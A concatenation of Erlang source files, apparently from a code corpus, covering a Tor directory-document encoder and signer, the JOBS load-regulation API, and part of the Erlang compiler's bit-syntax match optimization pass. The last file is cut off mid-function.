{"naked integer", ?_assert(to_term(<<"123">>, []) =:= 123)},
{"naked float", ?_assert(to_term(<<"-4.32e-17">>, []) =:= -4.32e-17)},
{"naked literal", ?_assert(to_term(<<"true">>, []) =:= true)},
{"naked string", ?_assert(to_term(<<"\"string\"">>, []) =:= <<"string">>)}
].
-endif. | src/jsx_to_term.erl | 0.523908 | 0.454533 | jsx_to_term.erl | starcoder |
%%%
%%% Copyright (c) 2016 The Talla Authors. All rights reserved.
%%% Use of this source code is governed by a BSD-style
%%% license that can be found in the LICENSE file.
%%%
%%% -----------------------------------------------------------
%%% @author <NAME> <<EMAIL>>
%%% @doc Document API.
%%%
%%% @end
%%% -----------------------------------------------------------
-module(onion_document).
%% API.
-export([decode/1,
encode/1,
get_item/2,
split/2,
ed25519_sign/2,
rsa_sign/2]).
-include("onion_test.hrl").
%% @doc Decode a Tor Document.
%%
%% Decodes a document according to the format described in section 1.2
%% of dir-spec.txt.
%%
%% @end
-spec decode(Data) -> {ok, [Item]} | {error, invalid_document}
when
Data :: binary(),
Item :: {Keyword, Arguments, Object},
Keyword :: atom() | binary(),
Arguments :: binary(),
Object :: term().
decode(<<>>) ->
{ok, []};
decode(Document) when is_binary(Document) ->
decode(erlang:binary_to_list(Document));
decode(Document) ->
try decode_(Document) of
Items ->
Items
catch
_Error:_WhatNow ->
{error, invalid_document}
end.
%% @private
-spec decode_(Document) -> {ok, [Item]}
when
Document :: binary(),
Item :: term().
decode_(Document) ->
{ok, Tokens, _EndLine} = onion_document_lexer:string(Document),
onion_document_parser:parse(Tokens).
%% @doc Encode a given Document into an iolist().
%%
%% This function encodes a given Document into an iolist().
%%
%% @end
-spec encode(Document) -> Data
when
Document :: [Item],
Item :: {Keyword, Arguments, Objects},
Keyword :: string() | atom() | binary(),
Arguments :: [binary()],
Objects :: [Object],
Object :: term(),
Data :: binary().
encode(Document) when is_list(Document) ->
iolist_to_binary(lists:map(fun encode_entry/1, Document)).
-spec get_item(Keyword, Document) -> Item | not_found
when
Keyword :: binary(),
Arguments :: [binary()],
Object :: [binary()],
Item :: {Keyword, Arguments} | {Keyword, Arguments, Object},
Document :: [Item].
get_item(Keyword, Document) ->
case lists:keysearch(keyword(Keyword), 1, Document) of
false ->
not_found;
{value, Item} ->
Item
end.
-spec split(Document, Keyword) -> [Document]
when
Keyword :: binary(),
Arguments :: [binary()],
Object :: [binary()],
Item :: {Keyword, Arguments} | {Keyword, Arguments, Object},
Document :: [Item].
split(Document, Keyword) ->
split(Document, Keyword, [], []).
split([], _Keyword, Data, Result) ->
lists:reverse([lists:reverse(Data) | Result]);
split([{Keyword, _} = Item | Rest], Keyword, Data, Result) ->
case Data of
[] ->
split(Rest, Keyword, [Item], Result);
_ ->
split(Rest, Keyword, [Item], [lists:reverse(Data) | Result])
end;
split([{Keyword, _, _} = Item | Rest], Keyword, Data, Result) ->
case Data of
[] ->
split(Rest, Keyword, [Item], Result);
_ ->
split(Rest, Keyword, [Item], [lists:reverse(Data) | Result])
end;
split([Item | Rest], Keyword, Data, Result) ->
split(Rest, Keyword, [Item | Data], Result).
ed25519_sign(Document, SecretKey) ->
EncodedDocument = encode(Document ++ [{'router-sig-ed25519', [<<>>]}]),
Prefix = <<"Tor router descriptor signature v1">>,
Signature = onion_ed25519:sign(<<Prefix/binary, EncodedDocument/binary>>, SecretKey),
Document ++ [{'router-sig-ed25519', [onion_base64:encode(Signature)]}].
rsa_sign(Document, SecretKey) ->
EncodedDocument = encode(Document ++ [{'router-signature', []}]),
Hash = crypto:hash(sha, EncodedDocument),
Signature = onion_rsa:private_encrypt(Hash, SecretKey, rsa_pkcs1_padding),
Document ++ [{'router-signature', [], [{'SIGNATURE', Signature}]}].
%% @private
-spec keyword(term()) -> binary().
keyword(V) when is_atom(V) ->
atom_to_binary(V, latin1);
keyword(V) when is_list(V) ->
list_to_binary(V);
keyword(V) when is_integer(V) ->
integer_to_binary(V);
keyword(V) when is_binary(V) ->
V.
%% @private
encode_arguments(Arguments) ->
encode_arguments(Arguments, []).
%% @private
encode_arguments([], Arguments) ->
lists:reverse(Arguments);
encode_arguments([Argument | Arguments], Acc) ->
encode_arguments(Arguments, [encode_argument(Argument) | Acc]).
%% @private
encode_argument({datetime, {{Year, Month, Day}, {Hour, Minute, Second}}}) ->
onion_string:format("~4..0b-~2..0b-~2..0b ~2..0b:~2..0b:~2..0b",
[Year, Month, Day, Hour, Minute, Second]);
encode_argument(Argument) ->
Argument.
%% @private
-spec encode_entry(DocumentEntry) -> iolist()
when
DocumentEntry :: {Keyword, Arguments, Objects},
Keyword :: string() | atom() | binary(),
Arguments :: [binary()],
Objects :: [Object],
Object :: term().
encode_entry({Keyword, Arguments}) ->
encode_entry({Keyword, Arguments, []});
encode_entry({Keyword, Arguments, Objects}) ->
[onion_lists:intersperse(<<" ">>, lists:map(fun keyword/1, [keyword(Keyword) | encode_arguments(Arguments)])), <<"\n">>,
lists:map(fun encode_object/1, Objects)];
encode_entry(List) when is_list(List) ->
lists:map(fun encode_entry/1, List).
%% @private
-spec encode_object(Object) -> iolist()
when
Object :: term().
encode_object({Type, Data}) ->
[onion_pem:encode(Type, Data)].
-ifdef(TEST).
decode_basic_test() ->
[
?assertEqual(decode(<<>>), {ok, []}),
?assertEqual(decode(<<"foobar">>), {ok, [{foobar, no_arguments, no_object}]}),
?assertEqual(decode(<<"foobar\nfoobar\n">>), {ok, [
{foobar, no_arguments, no_object},
{foobar, no_arguments, no_object}
]}),
?assertEqual(decode(<<"foo a b c\nbar d e f\n">>), {ok, [
{foo, <<"a b c">>, no_object},
{bar, <<"d e f">>, no_object}
]}),
?assertEqual(decode(<<"foo\n-----BEGIN foobar-----\nblah\n-----END foobar-----\n">>),
{ok, [
{foo, no_arguments, {<<"foobar">>, <<"blah">>}}
]}),
?assertEqual(decode(<<"?foo\n">>), {error, invalid_document})
].
-endif. | src/onion_document.erl | 0.544801 | 0.429549 | onion_document.erl | starcoder |
%%==============================================================================
%% Copyright 2010 Erlang Solutions Ltd.
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%==============================================================================
%%-------------------------------------------------------------------
%% File : jobs.erl
%% @author : <NAME> <<EMAIL>>
%% @doc
%% This is the public API of the JOBS framework.
%%
%% @end
%% Created : 15 Jan 2010 by <NAME> <<EMAIL>>
%%-------------------------------------------------------------------
-module(jobs).
-export([ask/1,
done/1,
job_info/1,
run/2,
enqueue/2,
dequeue/2]).
-export([ask_queue/2]).
%% Configuration API
-export([add_queue/2,
delete_queue/1,
info/1,
queue_info/1,
queue_info/2,
modify_regulator/4,
add_counter/2,
modify_counter/2,
delete_counter/1,
add_group_rate/2,
modify_group_rate/2,
delete_group_rate/1]).
%% @spec ask(Type) -> {ok, Opaque} | {error, Reason}
%% @doc Asks permission to run a job of Type. Returns when permission granted.
%%
%% The simplest way to have jobs regulated is to spawn a request per job.
%% The process should immediately call this function, and when granted
%% permission, execute the job, and then terminate.
%% If for some reason the process needs to remain, to execute more jobs,
%% it should explicitly call `jobs:done(Opaque)'.
%% This is not strictly needed when regulation is rate-based, but as the
%% regulation strategy may change over time, it is the prudent thing to do.
%% @end
%%
ask(Type) ->
jobs_server:ask(Type).
%% @spec done(Opaque) -> ok
%% @doc Signals completion of an executed task.
%%
%% This is used when the current process wants to submit more jobs to load
%% regulation. It is mandatory when performing counter-based regulation
%% (unless the process terminates after completing the task). It has no
%% effect if the job type is purely rate-regulated.
%% @end
%%
done(Opaque) ->
jobs_server:done(Opaque).
%% @spec run(Type, Function::function()) -> Result
%% @doc Executes Function() when permission has been granted by job regulator.
%%
%% This is equivalent to performing the following sequence:
%% <pre>
%% case jobs:ask(Type) of
%% {ok, Opaque} ->
%% try Function()
%% after
%% jobs:done(Opaque)
%% end;
%% {error, Reason} ->
%% erlang:error(Reason)
%% end.
%% </pre>
%% @end
%%
run(Queue, F) when is_function(F, 0); is_function(F, 1) ->
jobs_server:run(Queue, F).
enqueue(Queue, Item) ->
jobs_server:enqueue(Queue, Item).
dequeue(Queue, N) when N =:= infinity; is_integer(N), N > 0 ->
jobs_server:dequeue(Queue, N).
%% @spec job_info(Opaque) -> undefined | Info
%% @doc Retrieves job-specific information from the `Opaque' data object.
%%
%% The queue could choose to return specific information that is passed to a
%% granted job request. This could be used e.g. for load-balancing strategies.
%% @end
%%
job_info({_, Opaque}) ->
proplists:get_value(info, Opaque).
%% @spec add_queue(Name::any(), Options::[{Key,Value}]) -> ok
%% @doc Installs a new queue in the load regulator on the current node.
%% @end
%%
add_queue(Name, Options) ->
jobs_server:add_queue(Name, Options).
%% @spec delete_queue(Name) -> boolean()
%% @doc Deletes the named queue from the load regulator on the current node.
%% Returns `true' if there was in fact such a queue; `false' otherwise.
%% @end
%%
delete_queue(Name) ->
jobs_server:delete_queue(Name).
%% @spec ask_queue(QueueName, Request) -> Reply
%% @doc Sends a synchronous request to a specific queue.
%%
%% This function is mainly intended to be used for back-end processes that act
%% as custom extensions to the load regulator itself. It should not be used by
%% regular clients. Sophisticated queue behaviours could export gen_server-like
%% logic allowing them to respond to synchronous calls, either for special
%% inspection, or for influencing the queue state.
%% @end
%%
ask_queue(QueueName, Request) ->
jobs_server:ask_queue(QueueName, Request).
%% @spec add_counter(Name, Options) -> ok
%% @doc Adds a named counter to the load regulator on the current node.
%% Fails if there already is a counter the name `Name'.
%% @end
%%
add_counter(Name, Options) ->
jobs_server:add_counter(Name, Options).
%% @spec delete_counter(Name) -> boolean()
%% @doc Deletes a named counter from the load regulator on the current node.
%% Returns `true' if there was in fact such a counter; `false' otherwise.
%% @end
%%
delete_counter(Name) ->
jobs_server:delete_counter(Name).
%% @spec add_group_rate(Name, Options) -> ok
%% @doc Adds a group rate regulator to the load regulator on the current node.
%% Fails if there is already a group rate regulator of the same name.
%% @end
%%
add_group_rate(Name, Options) ->
jobs_server:add_group_rate(Name, Options).
delete_group_rate(Name) ->
jobs_server:delete_group_rate(Name).
info(Item) ->
jobs_server:info(Item).
queue_info(Name) ->
jobs_server:queue_info(Name).
queue_info(Name, Item) ->
jobs_server:queue_info(Name, Item).
modify_regulator(Type, QName, RegName, Opts) when Type==counter;Type==rate ->
jobs_server:modify_regulator(Type, QName, RegName, Opts).
modify_counter(CName, Opts) ->
jobs_server:modify_counter(CName, Opts).
modify_group_rate(GRName, Opts) ->
jobs_server:modify_group_rate(GRName, Opts). | src/jobs.erl | 0.642545 | 0.463869 | jobs.erl | starcoder |
%%
%% %CopyrightBegin%
%%
%% Copyright Ericsson AB 2018. All Rights Reserved.
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% %CopyrightEnd%
%%
%%%
%%% This pass optimizes bit syntax matching, and is centered around the concept
%%% of "match context reuse" which is best explained through example. To put it
%%% shortly we attempt to turn this:
%%%
%%% <<0,B/bits>> = A,
%%% <<1,C/bits>> = B,
%%% <<D,_/bits>> = C,
%%% D.
%%%
%%% ... Into this:
%%%
%%% <<0,1,D,_/bits>>=A,
%%% D.
%%%
%%% Which is much faster as it avoids the creation of intermediate terms. This
%%% is especially noticeable in loops where such garbage is generated on each
%%% iteration.
%%%
%%% The optimization itself is very simple and can be applied whenever there's
%%% matching on the tail end of a binary; instead of creating a new binary and
%%% starting a new match context on it, we reuse the match context used to
%%% extract the tail and avoid the creation of both objects.
%%%
%%% The catch is that a match context isn't a proper type and nothing outside
%%% of bit syntax match operations can handle them. We therefore need to make
%%% sure that they never "leak" into other instructions, and most of the pass
%%% revolves around getting around that limitation.
%%%
%%% Unlike most other passes we look at the whole module so we can combine
%%% matches across function boundaries, greatly increasing the performance of
%%% complex matches and loops.
%%%
-module(beam_ssa_bsm).
-export([module/2, format_error/1]).
-include("beam_ssa.hrl").
-include("beam_types.hrl").
-import(lists, [member/2, reverse/1, splitwith/2, map/2, foldl/3, mapfoldl/3,
nth/2, max/1, unzip/1]).
-spec format_error(term()) -> nonempty_string().
format_error(OptInfo) ->
format_opt_info(OptInfo).
-spec module(Module, Options) -> Result when
Module :: beam_ssa:b_module(),
Options :: [compile:option()],
Result :: {ok, beam_ssa:b_module(), list()}.
-define(PASS(N), {N,fun N/1}).
module(#b_module{body=Fs0}=Module, Opts) ->
ModInfo = analyze_module(Module),
%% combine_matches is repeated after accept_context_args as the control
%% flow changes can enable further optimizations, as in the example below:
%%
%% a(<<0,X/binary>>) -> a(X);
%% a(A) when bit_size(A) =:= 52 -> bar;
%% a(<<1,X/binary>>) -> X. %% Match context will be reused here when
%% %% when repeated.
{Fs, _} = compile:run_sub_passes(
[?PASS(combine_matches),
?PASS(accept_context_args),
?PASS(combine_matches),
?PASS(allow_context_passthrough),
?PASS(skip_outgoing_tail_extraction),
?PASS(annotate_context_parameters)],
{Fs0, ModInfo}),
Ws = case proplists:get_bool(bin_opt_info, Opts) of
true -> collect_opt_info(Fs);
false -> []
end,
{ok, Module#b_module{body=Fs}, Ws}.
-type module_info() :: #{ func_id() => func_info() }.
-type func_id() :: {Name :: atom(), Arity :: non_neg_integer()}.
-type func_info() :: #{ has_bsm_ops => boolean(),
parameters => [#b_var{}],
parameter_info => #{ #b_var{} => param_info() } }.
-type param_info() :: suitable_for_reuse |
{Problem :: atom(), Where :: term()}.
-spec analyze_module(#b_module{}) -> module_info().
analyze_module(#b_module{body=Fs}) ->
foldl(fun(#b_function{args=Parameters}=F, I) ->
FuncInfo = #{ has_bsm_ops => has_bsm_ops(F),
parameters => Parameters,
parameter_info => #{} },
FuncId = get_fa(F),
I#{ FuncId => FuncInfo }
end, #{}, Fs).
has_bsm_ops(#b_function{bs=Blocks}) ->
hbo_blocks(maps:to_list(Blocks)).
hbo_blocks([{_,#b_blk{is=Is}} | Blocks]) ->
case hbo_is(Is) of
false -> hbo_blocks(Blocks);
true -> true
end;
hbo_blocks([]) ->
false.
hbo_is([#b_set{op=bs_start_match} | _]) -> true;
hbo_is([_I | Is]) -> hbo_is(Is);
hbo_is([]) -> false.
%% Checks whether it's legal to make a call with the given argument as a match
%% context, returning the param_info() of the relevant parameter.
-spec check_context_call(#b_set{}, Arg, CtxChain, ModInfo) -> param_info() when
Arg :: #b_var{},
CtxChain :: [#b_var{}],
ModInfo :: module_info().
check_context_call(#b_set{args=Args}, Arg, CtxChain, ModInfo) ->
Aliases = [Arg | CtxChain],
ccc_1(Args, Arg, Aliases, ModInfo).
ccc_1([#b_local{}=Call | Args], Ctx, Aliases, ModInfo) ->
%% Matching operations assume that their context isn't aliased (as in
%% pointer aliasing), so we must reject calls whose arguments contain more
%% than one reference to the context.
%%
%% TODO: Try to fall back to passing binaries in these cases. Partial reuse
%% is better than nothing.
UseCount = foldl(fun(Arg, C) ->
case member(Arg, Aliases) of
true -> C + 1;
false -> C
end
end, 0, Args),
if
UseCount =:= 1 ->
#b_local{name=#b_literal{val=Name},arity=Arity} = Call,
Callee = {Name, Arity},
ParamInfo = funcinfo_get(Callee, parameter_info, ModInfo),
Parameters = funcinfo_get(Callee, parameters, ModInfo),
Parameter = nth(1 + arg_index(Ctx, Args), Parameters),
case maps:find(Parameter, ParamInfo) of
{ok, suitable_for_reuse} ->
suitable_for_reuse;
{ok, Other} ->
{unsuitable_call, {Call, Other}};
error ->
{no_match_on_entry, Call}
end;
UseCount > 1 ->
{multiple_uses_in_call, Call}
end;
ccc_1([#b_remote{}=Call | _Args], _Ctx, _CtxChain, _ModInfo) ->
{remote_call, Call};
ccc_1([Fun | _Args], _Ctx, _CtxChain, _ModInfo) ->
%% TODO: It may be possible to support this in the future for locally
%% defined funs, including ones with free variables.
{fun_call, Fun}.
%% Returns the index of Var in Args.
arg_index(Var, Args) -> arg_index_1(Var, Args, 0).
arg_index_1(Var, [Var | _Args], Index) -> Index;
arg_index_1(Var, [_Arg | Args], Index) -> arg_index_1(Var, Args, Index + 1).
is_tail_binary(#b_set{op=bs_match,args=[#b_literal{val=binary} | Rest]}) ->
member(#b_literal{val=all}, Rest);
is_tail_binary(#b_set{op=bs_get_tail}) ->
true;
is_tail_binary(_) ->
false.
is_tail_binary(#b_var{}=Var, Defs) ->
case find_match_definition(Var, Defs) of
{ok, Def} -> is_tail_binary(Def);
_ -> false
end;
is_tail_binary(_Literal, _Defs) ->
false.
assert_match_context(#b_var{}=Var, Defs) ->
case maps:find(Var, Defs) of
{ok, #b_set{op=bs_match,args=[_,#b_var{}=Ctx|_]}} ->
assert_match_context(Ctx, Defs);
{ok, #b_set{op=bs_start_match}} ->
ok
end.
find_match_definition(#b_var{}=Var, Defs) ->
case maps:find(Var, Defs) of
{ok, #b_set{op=bs_extract,args=[Ctx]}} -> maps:find(Ctx, Defs);
{ok, #b_set{op=bs_get_tail}=Def} -> {ok, Def};
_ -> error
end.
%% Returns a list of all contexts that were used to extract Var.
context_chain_of(#b_var{}=Var, Defs) ->
case maps:find(Var, Defs) of
{ok, #b_set{op=bs_match,args=[_,#b_var{}=Ctx|_]}} ->
[Ctx | context_chain_of(Ctx, Defs)];
{ok, #b_set{op=bs_get_tail,args=[Ctx]}} ->
[Ctx | context_chain_of(Ctx, Defs)];
{ok, #b_set{op=bs_extract,args=[Ctx]}} ->
[Ctx | context_chain_of(Ctx, Defs)];
_ ->
[]
end.
%% Grabs the match context used to produce the given variable.
match_context_of(#b_var{}=Var, Defs) ->
Ctx = match_context_of_1(Var, Defs),
assert_match_context(Ctx, Defs),
Ctx.
match_context_of_1(Var, Defs) ->
case maps:get(Var, Defs) of
#b_set{op=bs_extract,args=[#b_var{}=Ctx0]} ->
#b_set{op=bs_match,
args=[_,#b_var{}=Ctx|_]} = maps:get(Ctx0, Defs),
Ctx;
#b_set{op=bs_get_tail,args=[#b_var{}=Ctx]} ->
Ctx
end.
funcinfo_get(#b_function{}=F, Attribute, ModInfo) ->
funcinfo_get(get_fa(F), Attribute, ModInfo);
funcinfo_get({_,_}=Key, Attribute, ModInfo) ->
FuncInfo = maps:get(Key, ModInfo),
maps:get(Attribute, FuncInfo).
funcinfo_set(#b_function{}=F, Attribute, Value, ModInfo) ->
funcinfo_set(get_fa(F), Attribute, Value, ModInfo);
funcinfo_set(Key, Attribute, Value, ModInfo) ->
FuncInfo = maps:put(Attribute, Value, maps:get(Key, ModInfo, #{})),
maps:put(Key, FuncInfo, ModInfo).
get_fa(#b_function{ anno = Anno }) ->
{_,Name,Arity} = maps:get(func_info, Anno),
{Name,Arity}.
%% Replaces matched-out binaries with aliases that are lazily converted to
%% binary form when used, allowing us to keep the "match path" free of binary
%% creation.
-spec alias_matched_binaries(Blocks, Counter, AliasMap) -> Result when
Blocks :: beam_ssa:block_map(),
Counter :: non_neg_integer(),
AliasMap :: match_alias_map(),
Result :: {Blocks, Counter}.
-type match_alias_map() ::
#{ Binary :: #b_var{} =>
{ %% Replace all uses of Binary with an alias after this
%% label.
AliasAfter :: beam_ssa:label(),
%% The match context whose tail is equal to Binary.
Context :: #b_var{} } }.
%% Keeps track of the promotions we need to insert. They're partially keyed by
%% location because they may not be valid on all execution paths and we may
%% need to add redundant promotions in some cases.
-type promotion_map() ::
#{ { PromoteAt :: beam_ssa:label(),
Variable :: #b_var{} } =>
Instruction :: #b_set{} }.
-record(amb, { dominators :: beam_ssa:dominator_map(),
match_aliases :: match_alias_map(),
cnt :: non_neg_integer(),
promotions = #{} :: promotion_map() }).
alias_matched_binaries(Blocks0, Counter, AliasMap) when AliasMap =/= #{} ->
{Dominators, _} = beam_ssa:dominators(Blocks0),
State0 = #amb{ dominators = Dominators,
match_aliases = AliasMap,
cnt = Counter },
{Blocks, State} = beam_ssa:mapfold_blocks_rpo(fun amb_1/3, [0], State0,
Blocks0),
{amb_insert_promotions(Blocks, State), State#amb.cnt};
alias_matched_binaries(Blocks, Counter, _AliasMap) ->
{Blocks, Counter}.
amb_1(Lbl, #b_blk{is=Is0,last=Last0}=Block, State0) ->
{Is, State1} = mapfoldl(fun(I, State) ->
amb_assign_set(I, Lbl, State)
end, State0, Is0),
{Last, State} = amb_assign_last(Last0, Lbl, State1),
{Block#b_blk{is=Is,last=Last}, State}.
amb_assign_set(#b_set{op=phi,args=Args0}=I, _Lbl, State0) ->
%% Phi node aliases are relative to their source block, not their
%% containing block.
{Args, State} =
mapfoldl(fun({Arg0, Lbl}, Acc) ->
{Arg, State} = amb_get_alias(Arg0, Lbl, Acc),
{{Arg, Lbl}, State}
end, State0, Args0),
{I#b_set{args=Args}, State};
amb_assign_set(#b_set{args=Args0}=I, Lbl, State0) ->
{Args, State} = mapfoldl(fun(Arg0, Acc) ->
amb_get_alias(Arg0, Lbl, Acc)
end, State0, Args0),
{I#b_set{args=Args}, State}.
amb_assign_last(#b_ret{arg=Arg0}=T, Lbl, State0) ->
{Arg, State} = amb_get_alias(Arg0, Lbl, State0),
{T#b_ret{arg=Arg}, State};
amb_assign_last(#b_switch{arg=Arg0}=T, Lbl, State0) ->
{Arg, State} = amb_get_alias(Arg0, Lbl, State0),
{T#b_switch{arg=Arg}, State};
amb_assign_last(#b_br{bool=Arg0}=T, Lbl, State0) ->
{Arg, State} = amb_get_alias(Arg0, Lbl, State0),
{T#b_br{bool=Arg}, State}.
amb_get_alias(#b_var{}=Arg, Lbl, State) ->
case maps:find(Arg, State#amb.match_aliases) of
{ok, {AliasAfter, Context}} ->
%% Our context may not have been created yet, so we skip assigning
%% an alias unless the given block is among our dominators.
Dominators = maps:get(Lbl, State#amb.dominators),
case member(AliasAfter, Dominators) of
true -> amb_create_alias(Arg, Context, Lbl, State);
false -> {Arg, State}
end;
error ->
{Arg, State}
end;
amb_get_alias(#b_remote{mod=Mod0,name=Name0}=Arg0, Lbl, State0) ->
{Mod, State1} = amb_get_alias(Mod0, Lbl, State0),
{Name, State} = amb_get_alias(Name0, Lbl, State1),
Arg = Arg0#b_remote{mod=Mod,name=Name},
{Arg, State};
amb_get_alias(Arg, _Lbl, State) ->
{Arg, State}.
amb_create_alias(#b_var{}=Arg0, Context, Lbl, State0) ->
Dominators = maps:get(Lbl, State0#amb.dominators),
Promotions0 = State0#amb.promotions,
PrevPromotions =
[maps:get({Dom, Arg0}, Promotions0)
|| Dom <- Dominators, is_map_key({Dom, Arg0}, Promotions0)],
case PrevPromotions of
[_|_] ->
%% We've already created an alias prior to this block, so we'll
%% grab the most recent one to minimize stack use.
#b_set{dst=Alias} = max(PrevPromotions),
{Alias, State0};
[] ->
%% If we haven't created an alias we need to do so now. The
%% promotion will be inserted later by amb_insert_promotions/2.
Counter = State0#amb.cnt,
Alias = #b_var{name={'@ssa_bsm_alias', Counter}},
Promotion = #b_set{op=bs_get_tail,dst=Alias,args=[Context]},
Promotions = maps:put({Lbl, Arg0}, Promotion, Promotions0),
State = State0#amb{ promotions=Promotions, cnt=Counter+1 },
{Alias, State}
end.
amb_insert_promotions(Blocks0, State) ->
F = fun({Lbl, #b_var{}}, Promotion, Blocks) ->
Block = maps:get(Lbl, Blocks),
Alias = Promotion#b_set.dst,
{Before, After} = splitwith(
fun(#b_set{args=Args}) ->
not is_var_in_args(Alias, Args)
end, Block#b_blk.is),
Is = Before ++ [Promotion | After],
maps:put(Lbl, Block#b_blk{is=Is}, Blocks)
end,
maps:fold(F, Blocks0, State#amb.promotions).
is_var_in_args(Var, [Var | _]) -> true;
is_var_in_args(Var, [#b_remote{name=Var} | _]) -> true;
is_var_in_args(Var, [#b_remote{mod=Var} | _]) -> true;
is_var_in_args(Var, [_ | Args]) -> is_var_in_args(Var, Args);
is_var_in_args(_Var, []) -> false.
%%%
%%% Subpasses
%%%
%% Removes superflous chained bs_start_match instructions in the same
%% function. When matching on an extracted tail binary, or on a binary we've
%% already matched on, we reuse the original match context.
%%
%% This pass runs first since it makes subsequent optimizations more effective
%% by removing spots where promotion would be required.
-type prior_match_map() ::
#{ Binary :: #b_var{} =>
[{ %% The context and success label of a previous
%% bs_start_match made on this binary.
ValidAfter :: beam_ssa:label(),
Context :: #b_var{} }] }.
-record(cm, { definitions :: beam_ssa:definition_map(),
dominators :: beam_ssa:dominator_map(),
blocks :: beam_ssa:block_map(),
match_aliases = #{} :: match_alias_map(),
prior_matches = #{} :: prior_match_map(),
renames = #{} :: beam_ssa:rename_map() }).
combine_matches({Fs0, ModInfo}) ->
Fs = map(fun(F) -> combine_matches(F, ModInfo) end, Fs0),
{Fs, ModInfo}.
combine_matches(#b_function{bs=Blocks0,cnt=Counter0}=F, ModInfo) ->
case funcinfo_get(F, has_bsm_ops, ModInfo) of
true ->
{Dominators, _} = beam_ssa:dominators(Blocks0),
{Blocks1, State} =
beam_ssa:mapfold_blocks_rpo(
fun(Lbl, #b_blk{is=Is0}=Block0, State0) ->
{Is, State} = cm_1(Is0, [], Lbl, State0),
{Block0#b_blk{is=Is}, State}
end, [0],
#cm{ definitions = beam_ssa:definitions(Blocks0),
dominators = Dominators,
blocks = Blocks0 },
Blocks0),
Blocks2 = beam_ssa:rename_vars(State#cm.renames, [0], Blocks1),
{Blocks, Counter} = alias_matched_binaries(Blocks2, Counter0,
State#cm.match_aliases),
F#b_function{ bs=Blocks, cnt=Counter };
false ->
F
end.
cm_1([#b_set{ op=bs_start_match,
dst=Ctx,
args=[Src] },
#b_set{ op=succeeded,
dst=Bool,
args=[Ctx] }]=MatchSeq, Acc0, Lbl, State0) ->
Acc = reverse(Acc0),
case is_tail_binary(Src, State0#cm.definitions) of
true -> cm_combine_tail(Src, Ctx, Bool, Acc, State0);
false -> cm_handle_priors(Src, Ctx, Bool, Acc, MatchSeq, Lbl, State0)
end;
cm_1([I | Is], Acc, Lbl, State) ->
cm_1(Is, [I | Acc], Lbl, State);
cm_1([], Acc, _Lbl, State) ->
{reverse(Acc), State}.
%% If we're dominated by at least one match on the same source, we can reuse
%% the context created by that match.
cm_handle_priors(Src, DstCtx, Bool, Acc, MatchSeq, Lbl, State0) ->
PriorCtxs = case maps:find(Src, State0#cm.prior_matches) of
{ok, Priors} ->
%% We've seen other match contexts on this source, but
%% we can only consider the ones whose success path
%% dominate us.
Dominators = maps:get(Lbl, State0#cm.dominators, []),
[Ctx || {ValidAfter, Ctx} <- Priors,
member(ValidAfter, Dominators)];
error ->
[]
end,
case PriorCtxs of
[Ctx|_] ->
Renames0 = State0#cm.renames,
Renames = Renames0#{ Bool => #b_literal{val=true}, DstCtx => Ctx },
{Acc, State0#cm{ renames = Renames }};
[] ->
%% Since we lack a prior match, we need to register this one in
%% case we dominate another.
State = cm_register_prior(Src, DstCtx, Lbl, State0),
{Acc ++ MatchSeq, State}
end.
cm_register_prior(Src, DstCtx, Lbl, State) ->
Block = maps:get(Lbl, State#cm.blocks),
#b_br{succ=ValidAfter} = Block#b_blk.last,
Priors0 = maps:get(Src, State#cm.prior_matches, []),
Priors = [{ValidAfter, DstCtx} | Priors0],
PriorMatches = maps:put(Src, Priors, State#cm.prior_matches),
State#cm{ prior_matches = PriorMatches }.
cm_combine_tail(Src, DstCtx, Bool, Acc, State0) ->
SrcCtx = match_context_of(Src, State0#cm.definitions),
%% We replace the source with a context alias as it normally won't be used
%% on the happy path after being matched, and the added cost of conversion
%% is negligible if it is.
Aliases = maps:put(Src, {0, SrcCtx}, State0#cm.match_aliases),
Renames0 = State0#cm.renames,
Renames = Renames0#{ Bool => #b_literal{val=true}, DstCtx => SrcCtx },
State = State0#cm{ match_aliases = Aliases, renames = Renames },
{Acc, State}.
%% Lets functions accept match contexts as arguments. The parameter must be
%% unused before the bs_start_match instruction, and it must be matched in the
%% first block.
-record(aca, { unused_parameters :: ordsets:ordset(#b_var{}),
counter :: non_neg_integer(),
parameter_info = #{} :: #{ #b_var{} => param_info() },
match_aliases = #{} :: match_alias_map() }).
accept_context_args({Fs, ModInfo}) ->
mapfoldl(fun accept_context_args/2, ModInfo, Fs).
accept_context_args(#b_function{bs=Blocks0}=F, ModInfo0) ->
case funcinfo_get(F, has_bsm_ops, ModInfo0) of
true ->
Parameters = ordsets:from_list(funcinfo_get(F, parameters, ModInfo0)),
State0 = #aca{ unused_parameters = Parameters,
counter = F#b_function.cnt },
{Blocks1, State} = aca_1(Blocks0, State0),
{Blocks, Counter} = alias_matched_binaries(Blocks1,
State#aca.counter,
State#aca.match_aliases),
ModInfo = funcinfo_set(F, parameter_info, State#aca.parameter_info,
ModInfo0),
{F#b_function{bs=Blocks,cnt=Counter}, ModInfo};
false ->
{F, ModInfo0}
end.
aca_1(Blocks, State) ->
%% We only handle block 0 as we don't yet support starting a match after a
%% test. This is generally good enough as the sys_core_bsm pass makes the
%% match instruction come first if possible, and it's rare for a function
%% to binary-match several parameters at once.
EntryBlock = maps:get(0, Blocks),
aca_enable_reuse(EntryBlock#b_blk.is, EntryBlock, Blocks, [], State).
aca_enable_reuse([#b_set{op=bs_start_match,args=[Src]}=I0 | Rest],
EntryBlock, Blocks0, Acc, State0) ->
case aca_is_reuse_safe(Src, State0) of
true ->
{I, Last, Blocks1, State} =
aca_reuse_context(I0, EntryBlock, Blocks0, State0),
Is = reverse([I|Acc]) ++ Rest,
Blocks = maps:put(0, EntryBlock#b_blk{is=Is,last=Last}, Blocks1),
{Blocks, State};
false ->
{Blocks0, State0}
end;
